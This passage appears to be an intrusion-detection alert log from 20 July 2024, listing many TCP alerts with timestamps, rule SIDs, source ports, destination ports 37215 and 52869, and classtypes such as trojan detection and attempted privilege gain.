                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221365
                      SID:2835222
                      Source Port:32888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.124551
                      SID:2025132
                      Source Port:56988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.322613
                      SID:2025132
                      Source Port:38218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.084136
                      SID:2025132
                      Source Port:57298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.560520
                      SID:2831300
                      Source Port:43648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.035425
                      SID:2025132
                      Source Port:59144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.639622
                      SID:2831300
                      Source Port:35924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:08.291319
                      SID:2831300
                      Source Port:44488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.486908
                      SID:2027339
                      Source Port:37328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2835222
                      Source Port:52076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.663524
                      SID:2831300
                      Source Port:56232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2835222
                      Source Port:49684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.706162
                      SID:2027339
                      Source Port:36246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.282556
                      SID:2027339
                      Source Port:57398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:14.728323
                      SID:2025132
                      Source Port:48490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.633744
                      SID:2829579
                      Source Port:34962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2829579
                      Source Port:40494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.041672
                      SID:2025132
                      Source Port:39352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.650037
                      SID:2835222
                      Source Port:48746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2835222
                      Source Port:40256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.879276
                      SID:2027339
                      Source Port:48450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.006906
                      SID:2831300
                      Source Port:50982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:13.454278
                      SID:2027339
                      Source Port:53486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593640
                      SID:2027339
                      Source Port:57606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.182071
                      SID:2027339
                      Source Port:41506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.199406
                      SID:2025132
                      Source Port:53044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.054567
                      SID:2831300
                      Source Port:53286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2835222
                      Source Port:59874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2835222
                      Source Port:53134
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.905912
                      SID:2025132
                      Source Port:36034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.235405
                      SID:2027339
                      Source Port:58548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.242934
                      SID:2025132
                      Source Port:46470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.165438
                      SID:2025132
                      Source Port:51560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:53.715694
                      SID:2027339
                      Source Port:50214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.859405
                      SID:2027339
                      Source Port:55328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.142024
                      SID:2027339
                      Source Port:58070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.320024
                      SID:2025132
                      Source Port:57946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:07.942303
                      SID:2027339
                      Source Port:48530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.555687
                      SID:2831300
                      Source Port:47658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.994464
                      SID:2027339
                      Source Port:39712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2829579
                      Source Port:41624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.863888
                      SID:2027339
                      Source Port:52352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.052569
                      SID:2831300
                      Source Port:35926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.945909
                      SID:2027339
                      Source Port:38854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.359862
                      SID:2027339
                      Source Port:36196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.729047
                      SID:2025132
                      Source Port:49722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.994729
                      SID:2027339
                      Source Port:50988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.485253
                      SID:2027339
                      Source Port:54546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.555688
                      SID:2831300
                      Source Port:59662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2829579
                      Source Port:51692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.214052
                      SID:2027339
                      Source Port:49210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.719998
                      SID:2025132
                      Source Port:56050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.897212
                      SID:2025132
                      Source Port:53882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.228794
                      SID:2025132
                      Source Port:33084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.132473
                      SID:2027339
                      Source Port:42802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2829579
                      Source Port:49198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.537827
                      SID:2025132
                      Source Port:59110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.817297
                      SID:2835222
                      Source Port:43468
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.113044
                      SID:2027339
                      Source Port:47818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.062666
                      SID:2835222
                      Source Port:38446
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.874054
                      SID:2831300
                      Source Port:35300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.175702
                      SID:2831300
                      Source Port:57266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.400635
                      SID:2027339
                      Source Port:35330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.567356
                      SID:2027339
                      Source Port:39516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.157651
                      SID:2025132
                      Source Port:43672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.114267
                      SID:2835222
                      Source Port:55126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.062724
                      SID:2831300
                      Source Port:59740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.975513
                      SID:2829579
                      Source Port:37012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043863
                      SID:2829579
                      Source Port:36224
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.290518
                      SID:2027339
                      Source Port:39402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.645032
                      SID:2025132
                      Source Port:33712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.807258
                      SID:2027339
                      Source Port:32990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.423260
                      SID:2027339
                      Source Port:32990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650870
                      SID:2829579
                      Source Port:53870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.313050
                      SID:2025132
                      Source Port:52776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:11.630112
                      SID:2027339
                      Source Port:37112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.607132
                      SID:2025132
                      Source Port:46434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.275716
                      SID:2831300
                      Source Port:54548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:05.049337
                      SID:2025132
                      Source Port:56952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.982801
                      SID:2835222
                      Source Port:46168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2835222
                      Source Port:36788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.582295
                      SID:2831300
                      Source Port:37508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2829579
                      Source Port:41434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2829579
                      Source Port:52986
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.357047
                      SID:2025132
                      Source Port:34792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:04.091867
                      SID:2025132
                      Source Port:36946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.082339
                      SID:2027339
                      Source Port:36074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.742663
                      SID:2025132
                      Source Port:60010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2829579
                      Source Port:45326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982801
                      SID:2835222
                      Source Port:48970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.078618
                      SID:2831300
                      Source Port:43602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.093903
                      SID:2025132
                      Source Port:37616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2829579
                      Source Port:44056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806024
                      SID:2831300
                      Source Port:47288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.414030
                      SID:2831300
                      Source Port:56814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.996055
                      SID:2829579
                      Source Port:41248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.996056
                      SID:2835222
                      Source Port:59582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.979156
                      SID:2027339
                      Source Port:48088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.159872
                      SID:2027339
                      Source Port:47696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.506482
                      SID:2025132
                      Source Port:59958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2835222
                      Source Port:40944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.119426
                      SID:2027339
                      Source Port:53402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.600303
                      SID:2831300
                      Source Port:51466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.836373
                      SID:2831300
                      Source Port:33954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.630543
                      SID:2835222
                      Source Port:43640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2835222
                      Source Port:45042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.906353
                      SID:2831300
                      Source Port:49662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2829579
                      Source Port:39668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.553447
                      SID:2027339
                      Source Port:59228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.484487
                      SID:2025132
                      Source Port:51746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.387649
                      SID:2027339
                      Source Port:33180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.998794
                      SID:2027339
                      Source Port:55406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.567841
                      SID:2027339
                      Source Port:46500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2829579
                      Source Port:58100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.369883
                      SID:2025132
                      Source Port:53018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.656154
                      SID:2025132
                      Source Port:60622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221504
                      SID:2829579
                      Source Port:52232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.693711
                      SID:2831300
                      Source Port:37946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.222978
                      SID:2027339
                      Source Port:38392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.266946
                      SID:2027339
                      Source Port:42504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.108019
                      SID:2027339
                      Source Port:58110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.299761
                      SID:2025132
                      Source Port:60246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.831438
                      SID:2027339
                      Source Port:51672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.028316
                      SID:2027339
                      Source Port:60440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.099658
                      SID:2025132
                      Source Port:49536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.154067
                      SID:2835222
                      Source Port:50026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2835222
                      Source Port:41344
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.111043
                      SID:2025132
                      Source Port:37016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.148932
                      SID:2025132
                      Source Port:54090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.632780
                      SID:2025132
                      Source Port:53350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.281781
                      SID:2831300
                      Source Port:34146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.042671
                      SID:2025132
                      Source Port:55608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.592707
                      SID:2025132
                      Source Port:60594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.024843
                      SID:2831300
                      Source Port:59990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.868029
                      SID:2831300
                      Source Port:43854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.775082
                      SID:2027339
                      Source Port:55078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.113390
                      SID:2835222
                      Source Port:47014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2829579
                      Source Port:43312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.762943
                      SID:2027339
                      Source Port:58862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.706302
                      SID:2027339
                      Source Port:38048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2829579
                      Source Port:50868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.306318
                      SID:2025132
                      Source Port:39932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.943232
                      SID:2027339
                      Source Port:50526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.326982
                      SID:2831300
                      Source Port:44320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.972472
                      SID:2831300
                      Source Port:37332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.474339
                      SID:2027339
                      Source Port:51252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.700893
                      SID:2027339
                      Source Port:38084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.374543
                      SID:2027339
                      Source Port:53570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.414030
                      SID:2027339
                      Source Port:55036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.813001
                      SID:2027339
                      Source Port:60190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.148759
                      SID:2027339
                      Source Port:44778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333805
                      SID:2027339
                      Source Port:36734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.786028
                      SID:2831300
                      Source Port:38260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2835222
                      Source Port:57454
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.213822
                      SID:2025132
                      Source Port:60830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.374418
                      SID:2027339
                      Source Port:38966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.677814
                      SID:2027339
                      Source Port:43900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.886452
                      SID:2027339
                      Source Port:51918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.672944
                      SID:2831300
                      Source Port:55890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.848727
                      SID:2027339
                      Source Port:53540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221550
                      SID:2835222
                      Source Port:41818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.316096
                      SID:2027339
                      Source Port:49258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.010169
                      SID:2831300
                      Source Port:36492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.399678
                      SID:2027339
                      Source Port:60762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.412156
                      SID:2025132
                      Source Port:48118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2835222
                      Source Port:49758
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327808
                      SID:2831300
                      Source Port:44482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.091220
                      SID:2027339
                      Source Port:58794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.286262
                      SID:2025132
                      Source Port:32930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.220954
                      SID:2835222
                      Source Port:34064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.300793
                      SID:2027339
                      Source Port:36788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2829579
                      Source Port:46112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.407067
                      SID:2025132
                      Source Port:56622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2835222
                      Source Port:48740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.750742
                      SID:2027339
                      Source Port:42832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.476791
                      SID:2027339
                      Source Port:49842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.118475
                      SID:2025132
                      Source Port:55698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:12.248256
                      SID:2027339
                      Source Port:58000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.996056
                      SID:2829579
                      Source Port:59354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2829579
                      Source Port:32922
                      Destination Port:37215
                      Protocol:TCP
